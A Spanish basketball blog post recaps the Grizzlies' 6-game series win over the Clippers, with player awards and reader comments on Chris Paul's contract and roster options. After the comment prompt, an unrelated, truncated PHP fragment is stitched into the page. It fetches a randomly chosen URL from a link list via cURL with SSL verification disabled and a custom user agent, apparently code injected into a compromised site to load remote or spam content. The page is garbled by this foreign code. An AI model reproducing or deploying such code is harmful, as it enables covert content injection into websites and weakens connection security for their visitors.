Resumen Los Angeles Clippers 2 – Memphis Grizzlies 4

04 de May de 2013 por TheDeerHunter

Consumada la venganza tras la intensa serie que vivimos el año pasado. Dicen que en plato frío sabe mejor pero los Grizzlies no se quejarán de que las tornas se hayan girado de esta forma. Como hicieran sus rivales entonces se imponen contra pronóstico y con desventaja campo, cerrando un final tremendamente decepcionante para el equipo humilde de L.A., inoculándoles incertidumbres fundamentales en su proyecto vigente y, de paso, presentando sus credenciales a candidatos para alcanzar la final de conferencia.

¿Cuáles han sido las claves? De entrada, podemos jugar a las diferencias respecto a lo que pasó el año pasado:

Si entonces les faltaron referentes a los Grizzlies, este año han ido sobrados. No es lo mismo Rudy Gay que un Zach Randolph en forma. Sabemos que en determinadas circunstancias es un jugador fundamental. En el NBA Rank de este año en ESPN lo situaban el nº34 de la liga, Rudy Gay era el 32 y Blake Griffin el 14… El chaparrón de baloncesto que le ha caido a éste ha sido de tres pares y diría que no sorprende tanto como debería. Y por si éramos pocos, la madurez baloncestística de Marc. Volvemos a hablar del mejor juego interior de la liga, con total justicia. Tampoco olvidemos que los Clippers en ese aspecto no iban descalzos y la diferencia ha sido la que ha sido.  

Antaño Paul se comió vivo a Conley mientras que en esta serie la diferencia no ha sido tanta. No es demérito de CP3, que ha cumplido a un gran nivel. Se requería un paso adelante de Conley y lo ha dado. Precioso duelo.

En la victoria de Clippers del verano pasado no hubo color. La profundidad de plantilla marcó la diferencia de forma absoluta. Me voy a permitir ser ventajista. Lo avisábamos en octubre. Lo que le dio aquel banquillo a este equipo fue devastador y una correcta serie de Crawford, Barnes u Odom no lo iguala. La crítica iba más lejos. Dijimos que, para ser candidatos como se pretendía, tenían un problema grave en la posición 2-3 y así ha sido. De paso, decir que en esta ocasión Del Negro queda particularmente señalado.

PREMIOS

MVP: Por un lado Zipi, Zach Randolph, con una serie brutal, 21 puntos por partido, 8 rebotes, casi 2 asistencias y 1 robo… Perfectamente un top-10 de la liga. Por el otro Zape, Marc Gasol, sentando cátedra de tapado. Para mí difícilmente se entiende el juego de uno sin el del otro. Han nacido para jugar juntos. Griffin y, sobre todo, Jordan, tardarán tiempo en olvidarlos.

Sorpresa: Hollinger se la había jugado con la salida de Gay. Para muchos Tayshaun Prince es un ex jugador en activo y los cuchillos estaban afilados en caso de derrota. Es tener gen de campeón o no y ambos aleros han demostrado en su carrera lo que ahí tienen. Aún queda baloncesto en el interior del veterano alero.

Decepción: Podríamos mencionar a Billups y Butler… pero es que DeAndre Jordan es el que más cobra después de Chris Paul. El kilo de carne sale muy caro.

Esfuerzo en vano: Chris Paul ha cumplido a su nivel, pero demasiado solo. Mucho director para tan escasa orquesta.

Comenta

15 comentarios a esta entrada

  1. melo15 dice:
    #1

    Vaya decepción los Clippers, yo estaba seguro que iban a pasar pero TODOS los jugadores de los Grizzlies han dado un paso adelante: Bayless, Zach, Prince…Mientras que la mitad de los jugadores de los Clippers se han acobardado o no estan ya para estas batallas.
    Butler, Billups, Hill, Odom e incluso Crawford y Barnes no han estado a la altura y espera maas de ellos.
    Tampoco ha estado a la altura Griffin que no ha sido el interior dominante que tiene que ser. No hay excusas.
    Y Jordan pues un poco lo que ya sabiamos. Que no sirve para nada que no sea hacer mates, no es un buen defensor, no es un buen reboteador y ademas tiene menos IQ que McGee.

    Se avecina un verano movidito en Los Angeles porque no creo que Chris Paul quiera pasar sus mejores años en un equipo que no esta para llegar lejos en PO.
    Los Clippers han de dar un paso adelante y fichar algun agente libre de nivel en las posiciones de 2 o 3 porque a Jordan se lo van a tener que comer.

      Citar

  2. Denise dice:
    #2

    Para mi la clave es que por dentro los Grizzlies han sido claramente superiores.
    Ni banquillo ni leches, el banquillo de Clippers para mi lo ha hecho bien, Crawford en su papel de 6º hombre, Barnes que posiblemente sea el jugador no ya solo este año sino en todo lo que lleva de carrera que mejor rendimiento/salario, ha hecho unos buenos PO y un grandisimo ultimo partido con 30 puntos y 10 rebotes, y repito, el banquillo de Clippers no lo señalaría como culpable.
    Tampoco es que haya que darle muchos palos a Clippers porque Memphis es un gran equipo y los angelinos han dado la cara en la mayoría de los partidos, pero si hay que señalar a alguien, debe hacerse a sus titulares, Paul simplemente ha estado correcto, pero no estelar y en defensa se ha comido muchos puntos de Conley, Billups con la edad y la lesión poco puede hacer, del Butler de los Wizards ya sólo queda el nombre, pero tampoco lo ha hecho peor que en temporada regular, y sobretodo Griffin que ya sea por el tobillo maltrecho o no, no ha ejercido de lider. Para mí el pelirrojo va a peor, su mejor temporada creo que ha sido la de rookie. Y lo de DeAndre no tiene nombre, yo confío aun en este chaval en que sea capaz de sacarse algunos movimientos, pero es que es un autentico paquetazo en ataque, no puede jugar los instantes apretados porque lo llevan al tiro libre, y encima para todo lo grande y lo bestia que es, atrás en defensa tampoco marca diferencias.

      Citar

  3. Denise dice:
    #3

    melo15:

    Se avecina un verano movidito en Los Angeles porque no creo que Chris Paul quiera pasar sus mejores años en un equipo que no esta para llegar lejos en PO.
    Los Clippers han de dar un paso adelante y fichar algun agente libre de nivel en las posiciones de 2 o 3 porque a Jordan se lo van a tener que comer.

    Yo no veo el futuro tan negro. Yo creo que Paul renovará, salvo que el amigo Cuban tire la casa por la ventana. A ver, con esta base, los Clippers pueden llegar lejos en PO en años venideros, tampoco está lleno de jugadores acabados. Además, el año que vienen liberan contratos altos como los de Odom y Billups; y tratandose de Los Ángeles, seguro que hay agentes libres dispuestos a fichar por ellos y rodearse del glamour angelino.
    Hombre, DeAndre yo creo que es bastante traspasable, solo le quedan dos temporadas por cobrar (21 millones en total) y seguramente hay equipos que buscarían intercambiarlo por gente mas buena pero con contratos mas largos y mas millonadas pendientes de cobro. Por ejemplo, yo creo que Washington traspasaría ahora mismo con los ojos cerrados a Nené al cual le quedan 39 millones por cobrar por Jordan.

      Citar

  4. MagicJohnson32 dice:
    #4

    Qué disgusto más grande tengo con la eliminación de los Clippers, no os lo podéis ni imaginar…

      Citar

  5. rumbero dice:
    #5

    Bien por los ositos. Me alegro que se hayan tomado la revancha con los figuritas de los Clippers.
    He seguido poco la serie pero el hijo que les han hecho Zipi y Zape en la pintura es para mirárselo. A Griffin se le puede dar el beneficio de la duda por el tobillo (que tampoco) pero lo de Jordan… que jugada maestra hicieron en su momento los Warriors cuando “obligaron” a los Clippers a pagarle los 40 kilazos de contrato. Es que es muy cierto lo del banquillo de la temporada pasada, en esa eliminatoria el papel que tuvieron Martin y Evans fue fundamental. A ver si a CP3 le va a dar por pensárselo…

      Citar

  6. Denise dice:
    #6

    MagicJohnson32:
    Qué disgusto más grande tengo con la eliminación de los Clippers, no os lo podéis ni imaginar…

    Jaja, ojo al Tweet de Flea, bajista de los Chili Peppers y gran seguidor de Lakers.

    “Lakers have the most disappointing season in history and go out in 1st round. Clippers have best season in history and go out in first round”

      Citar

  7. Melo15 dice:
    #7

    Denise: Yo no veo el futuro tan negro. Yo creo que Paul renovará, salvo que el amigo Cuban tire la casa por la ventana. A ver, con esta base, los Clippers pueden llegar lejos en PO en años venideros, tampoco está lleno de jugadores acabados.Además, el año que vienen liberan contratos altos como los de Odom y Billups; y tratandose de Los Ángeles, seguro que hay agentes libres dispuestos a fichar por ellos y rodearse del glamour angelino.
    Hombre, DeAndre yo creo que es bastante traspasable, solo le quedan dos temporadas por cobrar (21 millones en total) y seguramente hay equipos que buscarían intercambiarlo por gente mas buena pero con contratos mas largos y mas millonadas pendientes de cobro. Por ejemplo, yo creo que Washington traspasaría ahora mismo con los ojos cerrados a Nené al cual le quedan 39 millones por cobrar por Jordan.

    Pero es que si no renueva se quedan sin nada, porque este equipo sin Paul no llega ni a Playoffs.
    He mirado la lista de agentes libres y esta Andre Iguodala que seria una buena opcion aunque dudo que puedan pagarle, JJ. Reddick, Corey Brewer, pero no veo como pueden reforzarse en estas posiciones.

      Citar

  8. Jose Luis dice:
    #8

    Yo creo que Paul no renueva… el equipo de los Clippers no da para mucho más, quizá segunda ronda, y mira que contratos… Griffin, Butler, Jordan… Bledose no podrán renovarle. Este equipo lo veo muy limitado la verdad, yo si fuera Paul no renovaba vamos. Quizá lo haga por la pasta, pero a Paul le veo luces como para no hacer eso. Un sign&trade tampoco lo descarto.

      Citar

  9. Denise dice:
    #9

    Jose Luis:
    Yo creo que Paul no renueva… el equipo de los Clippers no da para mucho más, quizá segunda ronda, y mira que contratos… Griffin, Butler, Jordan… Bledose no podrán renovarle. Este equipo lo veo muy limitado la verdad, yo si fuera Paul no renovaba vamos.

    Pero es que Paul no puede irse a equipos Top ahora mismo. No puede irse a Miami, NY, OKC, SAS, Memphis, Chicago, Brooklyn, Lakers, Boston….todos ellos tienen grandes bases ó están muy por encima del límite.
    Los únicos equipos apetecibles de grandes mercados que pueden seducir a Paul son los Mavs y los Rockets, pero ambos son conjuntos en construcción, mucho tienen que transformarse estos equipos para ser contenders al anillo incluso llegando Paul. Para mí, lo mejor sería renovar por Clippers. Es la mejor apuesta deportiva, económica y personalmente.

    Lo de limitado, es cuestión de gustos, si un equipo gana 50ypico partidos en el Oeste, consigue una racha de 21 victorias consecutivas y es limitado…apaga y vamonos. Crep que los Clippers o sus jugadores os caen mal y tendeis a infravalorarlos.

      Citar

  10. Denise dice:
    #10

    Melo15: Pero es que si no renueva se quedan sin nada, porque este equipo sin Paul no llega ni a Playoffs.
    He mirado la lista de agentes libres y esta Andre Iguodala que seria una buena opcion aunque dudo que puedan pagarle, JJ. Reddick, Corey Brewer, pero no veo como pueden reforzarse en estas posiciones.

    Si no renueva queda Jennings, Ellis, ó los de los Jazz Jefferson/Millsap y buscar un base traspasando a Jordan.
    Ojo, yo no descartaría que Paul renovase y Pierce que es angelino, se marchase a Clippers.

      Citar

  11. Jose Luis dice:
    #11

    Denise, ten en cuenta que para el proximo año empieza el contratazo de 16 millones de Griffin, que esta temporada estaba cobrando 7.

    16 + 10 + 20 ya son 46 millones, + 8 de Butler +5 de Crawford te plantas en 60 millones… no pueden reforzar mucho más. Quizá trade por Bledsoe y traer otro jugador con contrato rookie que pueda sumar, y poco más. No creo yo que un equipo así sea aspirante a superar 1ª ronda. Pierce tampoco va a firmar por el mínimo. Boston no va a hacer un trade por Butler para pagarle 8 a este en lugar de cortar a Pierce por 5. En todo caso, Butler + Bledosoe por Pierce, pero en ese caso Pierce cobraría sus 14 millones… vamos que el quinteto titular serían 65 millones Paul-Crawford-Pierce-Griffin-Jordan y tampoco les veo yo para pasar 1ª ronda, la verdad. Pierce parece bastante cascado.

    También es cierto queno hay equipos con espacio, y la pela es la pela y que quizá por ello renueve Paul. Supongo que los Hawks, Mavericks y los Rockets intentará ir a por Smith/Howard/Jefferson y Paul, uno de ellos sería por sign & trade claro está.

      Citar

  12. melo15 dice:
    #12

    Bueno, pensandolo friamente no tienen mal equipo, el problema que no se si eso basta para Paul y ademas en PO, Griffin, Jordan y Crawford se han cagado.

      Citar

  13. nba dice:
    #13

    La historia de “amor” que nos ha dejado Zacarias y la niñita Griffin , puede ser de las que hagan los playoffs interesantes en años venideros, sin ninguna duda Blake no ha podido con Z-Bo, pero todavia es joven y le queda mucho por aprender, veremos si los Clippers son capaces de retener a Paul en el equiso, lo veo dificil si sigue el tio “Vinny” al frente.
    Me da a mi que Wallace de Nets, va a acabar en Clippers …

      Citar

  14. nba dice:
    #14

    Denise: Pero es que Paul no puede irse a equipos Top ahora mismo. No puede irse a Miami, NY, OKC, SAS, Memphis, Chicago, Brooklyn, Lakers, Boston….todos ellos tienen grandes bases ó están muy por encima del límite.
    Los únicos equipos apetecibles de grandes mercados que pueden seducir a Paul son los Mavs y los Rockets, pero ambos son conjuntos en construcción, mucho tienen que transformarse estos equipos para ser contenders al anillo incluso llegando Paul. Para mí, lo mejor sería renovar por Clippers. Es la mejor apuesta deportiva, económica y personalmente.

    No descartes nada, que este verano te digo yo que va a ser movido, sobre todo si Heat gana su segundo anillo, ya que va a haber muchos GM, que pensaran que tienen que hacer cambios drasticos sino quieren que lo de Heat se convierta en una dinastia, con su poder de atracción de veteranos en busca de su ansiado anillo.

      Citar

  15. Esteban dice:
    #15

    mmm que olor a MAVS que tiene CP3, y ojo que si los celtics cortan a pierce, tambien lo veo con esa escudra

    ellos 3 mas contrstos bajos de kaman, collison, y lo que cobra carter mas algunos veteranos por el minimo, el propio devin harris podrian pelear nuevamente por el anillo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>